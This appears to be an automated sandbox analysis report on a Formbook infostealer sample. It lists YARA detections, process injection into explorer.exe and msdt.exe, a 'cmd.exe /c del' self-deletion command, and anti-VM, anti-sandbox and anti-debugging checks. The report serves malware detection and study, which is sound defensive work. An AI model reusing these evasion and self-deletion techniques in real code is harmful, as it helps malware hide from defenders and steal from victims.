Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@5/5

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKM_C36821010708320.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_01

Source: SKM_C36821010708320.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SKM_C36821010708320.exe

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\SKM_C36821010708320.exe 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
Source: unknown	Process created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe
Source: unknown	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SKM_C36821010708320.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SKM_C36821010708320.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msdt.pdbGCTL source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
Source:	Binary string: msdt.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: SKM_C36821010708320.exe, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.SKM_C36821010708320.exe.9d0000.0.unpack, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.SKM_C36821010708320.exe.b50000.1.unpack, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.SKM_C36821010708320.exe.b50000.0.unpack, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041D075 push eax; ret	2_2_0041D0C8
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041D0C2 push eax; ret	2_2_0041D0C8
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041D0CB push eax; ret	2_2_0041D132
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00408171 pushfd ; retf	2_2_00408172
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041D12C push eax; ret	2_2_0041D132
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00417206 push es; iretd	2_2_0041720C
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00406C46 push edi; iretd	2_2_00406C4E
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00417F59 push edi; retf	2_2_00417F5F
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_004167AE push 0000003Ah; retf	2_2_004167B2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0501D0D1 push ecx; ret	6_2_0501D0E4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03017206 push es; iretd	6_2_0301720C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301D12C push eax; ret	6_2_0301D132
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03008171 pushfd ; retf	6_2_03008172
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301D075 push eax; ret	6_2_0301D0C8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301D0C2 push eax; ret	6_2_0301D0C8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301D0CB push eax; ret	6_2_0301D132
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03017F59 push edi; retf	6_2_03017F5F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_030167AE push 0000003Ah; retf	6_2_030167B2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03006C46 push edi; iretd	6_2_03006C4E
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03000C7A push ebp; retf	6_2_03000C7E

Source: initial sample

Static PE information: section name: .text entropy: 7.22890252229

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE2

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SKM_C36821010708320.exe PID: 4740, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 00000000030098E4 second address: 00000000030098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000003009B4E second address: 0000000003009B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Code function: 2_2_00409A80 rdtsc

2_2_00409A80

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 3348	Thread sleep time: -53710s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 2336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5864	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5864	Thread sleep time: -98000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed

Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.255084026.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000003.00000002.579768204.0000000004DF3000.00000004.00000001.sdmp	Binary or memory string: 1efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAL
Source: explorer.exe, 00000003.00000002.581023913.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.255520845.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000003.00000000.248127457.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Code function: 2_2_00409A80 rdtsc

2_2_00409A80

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Code function: 2_2_0040ACC0 LdrLoadDll,

2_2_0040ACC0

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508E539 mov eax, dword ptr fs:[00000030h]	6_2_0508E539
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0504A537 mov eax, dword ptr fs:[00000030h]	6_2_0504A537
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05098D34 mov eax, dword ptr fs:[00000030h]	6_2_05098D34
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05003D43 mov eax, dword ptr fs:[00000030h]	6_2_05003D43
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05043540 mov eax, dword ptr fs:[00000030h]	6_2_05043540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD849B mov eax, dword ptr fs:[00000030h]	6_2_04FD849B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE746D mov eax, dword ptr fs:[00000030h]	6_2_04FE746D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050905AC mov eax, dword ptr fs:[00000030h]	6_2_050905AC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050905AC mov eax, dword ptr fs:[00000030h]	6_2_050905AC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFA44B mov eax, dword ptr fs:[00000030h]	6_2_04FFA44B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]	6_2_05046DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]	6_2_05046DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]	6_2_05046DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046DC9 mov ecx, dword ptr fs:[00000030h]	6_2_05046DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]	6_2_05046DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]	6_2_05046DC9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFBC2C mov eax, dword ptr fs:[00000030h]	6_2_04FFBC2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0508FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0508FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0508FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]	6_2_0508FDE2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05078DF1 mov eax, dword ptr fs:[00000030h]	6_2_05078DF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]	6_2_0509740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]	6_2_0509740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]	6_2_0509740D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]	6_2_05081C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]	6_2_05046C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]	6_2_05046C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]	6_2_05046C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]	6_2_05046C0A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]	6_2_04FDD5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]	6_2_04FDD5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]	6_2_04FF1DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]	6_2_04FF1DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]	6_2_04FF1DB5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505C450 mov eax, dword ptr fs:[00000030h]	6_2_0505C450
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0505C450 mov eax, dword ptr fs:[00000030h]	6_2_0505C450
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF35A1 mov eax, dword ptr fs:[00000030h]	6_2_04FF35A1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFFD9B mov eax, dword ptr fs:[00000030h]	6_2_04FFFD9B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFFD9B mov eax, dword ptr fs:[00000030h]	6_2_04FFFD9B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]	6_2_04FC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]	6_2_04FC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]	6_2_04FC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]	6_2_04FC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]	6_2_04FC2D8A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]	6_2_04FF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]	6_2_04FF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]	6_2_04FF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]	6_2_04FF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEC577 mov eax, dword ptr fs:[00000030h]	6_2_04FEC577
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FEC577 mov eax, dword ptr fs:[00000030h]	6_2_04FEC577
